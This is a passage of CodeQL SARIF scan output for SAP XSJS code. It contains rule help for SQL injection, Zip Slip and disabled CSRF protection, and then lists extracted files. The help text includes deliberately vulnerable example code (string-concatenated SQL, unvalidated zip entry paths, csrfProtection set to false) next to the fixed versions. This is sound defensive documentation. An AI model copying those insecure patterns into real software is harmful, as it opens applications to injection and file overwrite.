vulnerability."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# SQL Injection\n\nParameterizing an SQL statement in an unsafe way by directly concatenating the parameter to the statement body may allow arbitrary SQL code fragments to be included to the statement, resulting in possibly destructive behavior.\n\n## Recommendation\n\n### Use XSJS APIs that prepares SQL statements\n\nThere are two versions of API to communicate with SAP HANA, and both APIs provide means of preparing SQL statements that not only facilitates code reuse but also protects the parameterize statement from SQL injections.\n\nThese functions take as first argument an SQL string with placeholders represented as a question mark surrounded with parentheses (`(?)`), and the rest of the arguments consist of JavaScript expressions whose values are filled into the position of the respective placeholders.\n\n#### Using the older API (`$.db`)\n\nIf you are using the older API that belongs to `$.db`, consider replacing string concatentation with `$.db.executeQuery`. For example, the following XSJS application substitutes the value of `someParameterValue1` and `someParameterValue2` into the position of the first and second placeholder positions, respectively.\n\n``` javascript\nlet query = \"INSERT INTO (?) (COL1) VALUES (?)\";\n\nlet dbConnection = $.db.getConnection();\ndbConnection.executeQuery(query, someParameterValue1, someParameterValue2);\n```\n\n#### Using the newer API (`$.hdb`)\n\nIf you are using the newer API that belongs to `$.hdb`, consider replacing string concatentation with `$.hdb.Connection.prepareStatement` followed by `$.db.PreparedStatement.executeUpdate`. For example, the following XSJS application substitues the value of `someParameterValue1` and `someParameterValue2` into the position of the first and second placeholder positions, respectively. After preparation, the application executes the prepared statement and then commits it to the SAP HANA database.\n\n``` javascript\nlet query = \"INSERT INTO (?) (COL1) VALUES (?)\";\nlet dbConnection = $.db.getConnection();\nlet preparedStatement = dbConnection.prepareStatement(query, someParameterValue1, someParameterValue2);\npreparedStatement.executeUpdate();\ndbConnection.commit();\n```\n\n## Example\n\nEach of the following XSJS applications directly concatenates the values of two request paremeters with fragments of an SQL query and executes it.\n\n#### Using the older API (`$.db`)\n\n``` javascript\nlet someParameterValue1 = JSON.parse(requestParameters.get(\"someParameter1\"));\nlet someParameterValue2 = JSON.parse(requestParameters.get(\"someParameter2\"));\nlet query = \"INSERT INTO \" + someParameterValue1 + \".ENTITY (COL1) VALUES (\" + someParameterValue2 + \")\";\n\nlet dbConnection = $.db.getConnection();\nlet preparedStatement = dbConnection.prepareStatement(query);\npreparedStatement.executeUpdate();\ndbConnection.commit();\n```\n\n#### Using the newer API (`$.hdb`)\n\n``` javascript\nlet someParameterValue1 = JSON.parse(requestParameters.get(\"someParameter1\"));\nlet someParameterValue2 = JSON.parse(requestParameters.get(\"someParameter2\"));\nlet query = \"INSERT INTO \" + someParameterValue1 + \" (COL1) VALUES (\" + someParameterValue2 + \")\";\n\nlet dbConnection = $.db.getConnection();\ndbConnection.executeQuery(query);\ndbConnection.commit();\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* SAP: [Server-Side JavaScript: Injection Flaws\n](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/3e9a0491d2af4b908081fbbee12bc8ba.html).\n* OWASP: [SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n","markdown":"# SQL Injection\n\nParameterizing an SQL statement in an unsafe way by directly concatenating the parameter to the statement body may allow arbitrary SQL code fragments to be included to the statement, resulting in possibly destructive behavior.\n\n## Recommendation\n\n### Use XSJS APIs that prepares SQL statements\n\nThere are two versions of API to communicate with SAP HANA, and both APIs provide means of preparing SQL statements that not only facilitates code reuse but also protects the parameterize statement from SQL injections.\n\nThese functions take as first argument an SQL string with placeholders represented as a question mark surrounded with parentheses (`(?)`), and the rest of the arguments consist of JavaScript expressions whose values are filled into the position of the respective placeholders.\n\n#### Using the older API (`$.db`)\n\nIf you are using the older API that belongs to `$.db`, consider replacing string concatentation with `$.db.executeQuery`. For example, the following XSJS application substitutes the value of `someParameterValue1` and `someParameterValue2` into the position of the first and second placeholder positions, respectively.\n\n``` javascript\nlet query = \"INSERT INTO (?) (COL1) VALUES (?)\";\n\nlet dbConnection = $.db.getConnection();\ndbConnection.executeQuery(query, someParameterValue1, someParameterValue2);\n```\n\n#### Using the newer API (`$.hdb`)\n\nIf you are using the newer API that belongs to `$.hdb`, consider replacing string concatentation with `$.hdb.Connection.prepareStatement` followed by `$.db.PreparedStatement.executeUpdate`. For example, the following XSJS application substitues the value of `someParameterValue1` and `someParameterValue2` into the position of the first and second placeholder positions, respectively. After preparation, the application executes the prepared statement and then commits it to the SAP HANA database.\n\n``` javascript\nlet query = \"INSERT INTO (?) (COL1) VALUES (?)\";\nlet dbConnection = $.db.getConnection();\nlet preparedStatement = dbConnection.prepareStatement(query, someParameterValue1, someParameterValue2);\npreparedStatement.executeUpdate();\ndbConnection.commit();\n```\n\n## Example\n\nEach of the following XSJS applications directly concatenates the values of two request paremeters with fragments of an SQL query and executes it.\n\n#### Using the older API (`$.db`)\n\n``` javascript\nlet someParameterValue1 = JSON.parse(requestParameters.get(\"someParameter1\"));\nlet someParameterValue2 = JSON.parse(requestParameters.get(\"someParameter2\"));\nlet query = \"INSERT INTO \" + someParameterValue1 + \".ENTITY (COL1) VALUES (\" + someParameterValue2 + \")\";\n\nlet dbConnection = $.db.getConnection();\nlet preparedStatement = dbConnection.prepareStatement(query);\npreparedStatement.executeUpdate();\ndbConnection.commit();\n```\n\n#### Using the newer API (`$.hdb`)\n\n``` javascript\nlet someParameterValue1 = JSON.parse(requestParameters.get(\"someParameter1\"));\nlet someParameterValue2 = JSON.parse(requestParameters.get(\"someParameter2\"));\nlet query = \"INSERT INTO \" + someParameterValue1 + \" (COL1) VALUES (\" + someParameterValue2 + \")\";\n\nlet dbConnection = $.db.getConnection();\ndbConnection.executeQuery(query);\ndbConnection.commit();\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* SAP: [Server-Side JavaScript: Injection Flaws\n](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/3e9a0491d2af4b908081fbbee12bc8ba.html).\n* OWASP: [SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n"},"properties":{"tags":["security"],"description":"Directly concatenating an uncontrolled value with an SQL query allows\n              for an SQL injection vulnerability.","id":"js/xsjs-sql-injection","kind":"path-problem","name":"XSJS SQL injection","precision":"medium","problem.severity":"error","security-severity":"8.8"}},{"id":"js/xsjs-zip-slip","name":"js/xsjs-zip-slip","shortDescription":{"text":"XSJS Zip Slip"},"fullDescription":{"text":"Saving an entry of a zip archive into a file with its stated path allows for a path traversal and writing to an arbitrary location."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Zip Slip\n\nA zip archive received from a remote location may contain arbitrary paths which, when translated to an absolute path, may escape the directory where it is extracted. Such paths may include one or more `../` to traverse the directory tree upwards to write to an arbitrary location, such as the root directory (`/`) or a sensitive path like `/usr/local/`. A sophisticated attack may also attempt to overwrite an existing file by making the filename identical as that of the target file.\n\n## Recommendation\n\nValidate the path of each zip entry before writing them to a file. Several different tactics may be used to prevent the path traversal by one or more of `../` occuring in a zip entry's path.\n\n### Check if the path string contains `../`\n\nA naive but effective way to validate the path of a zip entry is to check if its path, converted to string, contains any occurrences of `../`. If a path does have one, then it can be suspected that the creator of the zip archive is attempting a path traversal attack.\n\n### Resolve the path and check if the target directory is its prefix \n\nA more sophisticated way is to use a JavaScript library function that can be used to check if a substring is a prefix of a string. For example, the following XSJS application uses `String.indexOf(substring)` to check if the name of the directory is indeed the directory resolved by `path.join(prefix, suffix)`. If the absolute path obtained by the `join` function does not start with the target folder's name, the `entryPath` contains bits such as `../` that traverses the path.\n\n``` javascript\nvar zipArchive = new $.util.Zip(requestBody.asArrayBuffer());\nvar targetFolderName = \"unzipped\";\n\nfor (var entryPath in zipArchive) {\n  var targetFilePath = require(\"path\").join(targetFolderName, entryPath)\n  if (targetFilePath.indexOf(targetFolderName) === 0) {\n    require(\"fs\").createWriteStream(targetFilePath).write(zip[entryPath]);\n  }\n}\n```\n\n### Example\n\nThis XSJS application simply appends the path of each entry to a target directory name and a separator then saves it to a file with the concatenated path, thereby skipping any validation on it.\n\n``` javascript\nvar zipArchive = new $.util.Zip(requestBody.asArrayBuffer());\nvar targetFolderName = \"unzipped\";\n\nfor (var entryPath in zipArchive) {\n  var targetFilePath = targetFolderName + \"/\" + entryPath;\n  require(\"fs\").createWriteStream(targetFilePath).write(zip[entryPath]);\n}\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* SAP XSJS Documentation: [$.util.Zip](https://help.sap.com/doc/3de842783af24336b6305a3c0223a369/2.0.03/en-US/$.util.Zip.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-59](https://cwe.mitre.org/data/definitions/59.html).\n","markdown":"# Zip Slip\n\nA zip archive received from a remote location may contain arbitrary paths which, when translated to an absolute path, may escape the directory where it is extracted. Such paths may include one or more `../` to traverse the directory tree upwards to write to an arbitrary location, such as the root directory (`/`) or a sensitive path like `/usr/local/`. A sophisticated attack may also attempt to overwrite an existing file by making the filename identical as that of the target file.\n\n## Recommendation\n\nValidate the path of each zip entry before writing them to a file. Several different tactics may be used to prevent the path traversal by one or more of `../` occuring in a zip entry's path.\n\n### Check if the path string contains `../`\n\nA naive but effective way to validate the path of a zip entry is to check if its path, converted to string, contains any occurrences of `../`. If a path does have one, then it can be suspected that the creator of the zip archive is attempting a path traversal attack.\n\n### Resolve the path and check if the target directory is its prefix \n\nA more sophisticated way is to use a JavaScript library function that can be used to check if a substring is a prefix of a string. For example, the following XSJS application uses `String.indexOf(substring)` to check if the name of the directory is indeed the directory resolved by `path.join(prefix, suffix)`. If the absolute path obtained by the `join` function does not start with the target folder's name, the `entryPath` contains bits such as `../` that traverses the path.\n\n``` javascript\nvar zipArchive = new $.util.Zip(requestBody.asArrayBuffer());\nvar targetFolderName = \"unzipped\";\n\nfor (var entryPath in zipArchive) {\n  var targetFilePath = require(\"path\").join(targetFolderName, entryPath)\n  if (targetFilePath.indexOf(targetFolderName) === 0) {\n    require(\"fs\").createWriteStream(targetFilePath).write(zip[entryPath]);\n  }\n}\n```\n\n### Example\n\nThis XSJS application simply appends the path of each entry to a target directory name and a separator then saves it to a file with the concatenated path, thereby skipping any validation on it.\n\n``` javascript\nvar zipArchive = new $.util.Zip(requestBody.asArrayBuffer());\nvar targetFolderName = \"unzipped\";\n\nfor (var entryPath in zipArchive) {\n  var targetFilePath = targetFolderName + \"/\" + entryPath;\n  require(\"fs\").createWriteStream(targetFilePath).write(zip[entryPath]);\n}\n```\n\n## References\n\n* SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/b5e65421b48c48fa87312a6023f4c414.html).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* SAP XSJS Documentation: [$.util.Zip](https://help.sap.com/doc/3de842783af24336b6305a3c0223a369/2.0.03/en-US/$.util.Zip.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-59](https://cwe.mitre.org/data/definitions/59.html).\n"},"properties":{"tags":["security"],"description":"Saving an entry of a zip archive into a file with its stated path\n              allows for a path traversal and writing to an arbitrary location.","id":"js/xsjs-zip-slip","kind":"path-problem","name":"XSJS Zip Slip","precision":"medium","problem.severity":"error","security-severity":"7.5"}},{"id":"js/xsjs-disabled-csrf-protection","name":"js/xsjs-disabled-csrf-protection","shortDescription":{"text":"Disabled XSJS CSRF protection"},"fullDescription":{"text":"Disabling CSRF protection makes the application vulnerable to a Cross-Site Request Forgery (CSRF) attack."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# CSRF protection disabled in HANA XS application\n\nThis XS application is not protected against CSRF (cross-site request forgery) because it either disables the protection or fails to enable the protection explicitly.\n\n## Overview\n\nA web server that receives a request from a client without verifying that it was intentionally sent might be vulnerable to Cross Site Request Forgery (CSRF). An attacker can trick a client into making an unintended request to the web server that will be treated as an authentic request. This can be done via a URL, image load, `XMLHttpRequest`, etc. and can result in exposure of data or unintended code execution.\n\n## Recommendation\n\nSAP’s recommendation is to use CSRF protection for any request that could be processed by a browser client by normal users.\n- If `XS Advanced` is used, CSRF protection is configured with the `\"csrfProtection\"` property of `xs-app.json`. It is **enabled by default and should not be disabled.**\n- If `XS Classic` is used, CSRF protection is configured with the `\"prevent_xsrf\"` property of `.xsaccess`. It is **disabled by default and should be enabled explicitly.**\n\n## Example\n\nThe following `xs-app.json` fragment disables CSRF protection of the application it configures.\n\n```json\n\"routes\": [\n    {\n        \"source\": \"/bad/(.*)\",\n        \"destination\": \"srv_api\",\n        \"csrfProtection\": false,\n        ...\n    },\n    ...\n]\n```\n\n## References\n\n- SAP: [XS Advanced Application Router Configuration Syntax](https://help.sap.com/docs/SAP_HANA_PLATFORM/b3d0daf2a98e49ada00bf31b7ca7a42e/a9fc5c220d744180850996e2f5d34d6c.html?version=2.0.03#loioa9fc5c220d744180850996e2f5d34d6c__section_N101F7_N10016_N10001), relavant to XS Classic applications.\n- SAP: [Application-Access File Keyword Options, prevent_xsrf](https://help.sap.com/docs/SAP_HANA_PLATFORM/4505d0bdaf4948449b7f7379d24d0f0d/5f77e58ec01b46f6b64ee1e2afe3ead7.html#authenticationmethod), relevant to XS Advanced applications.\n- SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/e8a6bc904c0c48a182288604f467e84a.html).\n- Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n- OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)).\n","markdown":"# CSRF protection disabled in HANA XS application\n\nThis XS application is not protected against CSRF (cross-site request forgery) because it either disables the protection or fails to enable the protection explicitly.\n\n## Overview\n\nA web server that receives a request from a client without verifying that it was intentionally sent might be vulnerable to Cross Site Request Forgery (CSRF). An attacker can trick a client into making an unintended request to the web server that will be treated as an authentic request. This can be done via a URL, image load, `XMLHttpRequest`, etc. and can result in exposure of data or unintended code execution.\n\n## Recommendation\n\nSAP’s recommendation is to use CSRF protection for any request that could be processed by a browser client by normal users.\n- If `XS Advanced` is used, CSRF protection is configured with the `\"csrfProtection\"` property of `xs-app.json`. It is **enabled by default and should not be disabled.**\n- If `XS Classic` is used, CSRF protection is configured with the `\"prevent_xsrf\"` property of `.xsaccess`. It is **disabled by default and should be enabled explicitly.**\n\n## Example\n\nThe following `xs-app.json` fragment disables CSRF protection of the application it configures.\n\n```json\n\"routes\": [\n    {\n        \"source\": \"/bad/(.*)\",\n        \"destination\": \"srv_api\",\n        \"csrfProtection\": false,\n        ...\n    },\n    ...\n]\n```\n\n## References\n\n- SAP: [XS Advanced Application Router Configuration Syntax](https://help.sap.com/docs/SAP_HANA_PLATFORM/b3d0daf2a98e49ada00bf31b7ca7a42e/a9fc5c220d744180850996e2f5d34d6c.html?version=2.0.03#loioa9fc5c220d744180850996e2f5d34d6c__section_N101F7_N10016_N10001), relavant to XS Classic applications.\n- SAP: [Application-Access File Keyword Options, prevent_xsrf](https://help.sap.com/docs/SAP_HANA_PLATFORM/4505d0bdaf4948449b7f7379d24d0f0d/5f77e58ec01b46f6b64ee1e2afe3ead7.html#authenticationmethod), relevant to XS Advanced applications.\n- SAP: [Server-Side JavaScript Security Considerations](https://help.sap.com/docs/SAP_HANA_PLATFORM/d89d4595fae647eabc14002c0340a999/e8a6bc904c0c48a182288604f467e84a.html).\n- Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n- OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)).\n"},"properties":{"tags":["security","external/cwe/cwe-352"],"description":"Disabling CSRF protection makes the application vulnerable to a Cross-Site Request Forgery (CSRF) attack.","id":"js/xsjs-disabled-csrf-protection","kind":"problem","name":"Disabled XSJS CSRF protection","precision":"high","problem.severity":"error","security-severity":"8.8"}}],"locations":[{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/xsjs/src/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/xsjs/src/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"advanced-security/javascript-sap-xsjs-models","semanticVersion":"2.3.0","locations":[{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/.github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/.github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}],"properties":{"isCodeQLModelPack":true}}]},"invocations":[{"toolExecutionNotifications":[{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/codeStyles/codeStyleConfig.xml","uriBaseId":"%SRCROOT%","index":4}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/codeStyles/Project.xml","uriBaseId":"%SRCROOT%","index":5}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/modules.xml","uriBaseId":"%SRCROOT%","index":6}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/inspectionProfiles/Project_Default.xml","uriBaseId":"%SRCROOT%","index":7}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/encoding/node_modules/iconv-lite/.idea/vcs.xml","uriBaseId":"%SRCROOT%","index":8}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-5821ca4a7405c17bc03fe9c833aa52212563b6d17f24eb61f8af574bf1095ef1/node_modules/@sap/cds-dk/node_modules/xml-js/bin/test.xml","uriBaseId":"%SRCROOT%","index":9}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".cds-extractor-cache/cds-d8a826697297b88e55595779ee2ab973e23d88ec44cdd9b66e0b3b95582ffc2d/node_modules/@sap/cds-dk/node_modules/xml-js/bin/test.xml","uriBaseId":"%SRCROOT%","index":10}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/codeql-config.yaml","uriBaseId":"%SRCROOT%","index":11}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":12}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":13}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":14}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml","uriBaseId":"%SRCROOT%","index":15}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":16}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/xsjs.model.yml","uriBaseId":"%SRCROOT%","index":17}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml","uriBaseId":"%SRCROOT%","index":18}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":19}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":20}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/cds-extractor-dist-bundle.yml","uriBaseId":"%SRCROOT%","index":21}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/code_scanning.yml","uriBaseId":"%SRCROOT%","index":22}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/codeql-ql.yml","uriBaseId":"%SRCROOT%","index":23}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/run-codeql-unit-tests-javascript.yml","uriBaseId":"%SRCROOT%","index":24}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/update-codeql.yml","uriBaseId":"%SRCROOT%","index":25}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"cds-extractor-marker.js","uriBaseId":"%SRCROOT%","index":26}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/codeql-extractor.yml","uriBaseId":"%SRCROOT%","index":27}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"codeql-workspace.yml","uriBaseId":"%SRCROOT%","index":28}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/.prettierrc.js","uriBaseId":"%SRCROOT%","index":29}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/cds-extractor.ts","uriBaseId":"%SRCROOT%","index":30}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/dist/cds-extractor.bundle.js","uriBaseId":"%SRCROOT%","index":31}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/esbuild.config.mjs","uriBaseId":"%SRCROOT%","index":32}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/eslint.config.mjs","uriBaseId":"%SRCROOT%","index":33}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/jest.config.js","uriBaseId":"%SRCROOT%","index":34}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/package-lock.json","uriBaseId":"%SRCROOT%","index":35}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/package.json","uriBaseId":"%SRCROOT%","index":36}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/command.ts","uriBaseId":"%SRCROOT%","index":37}}}],"message":{"text":""},"level":"none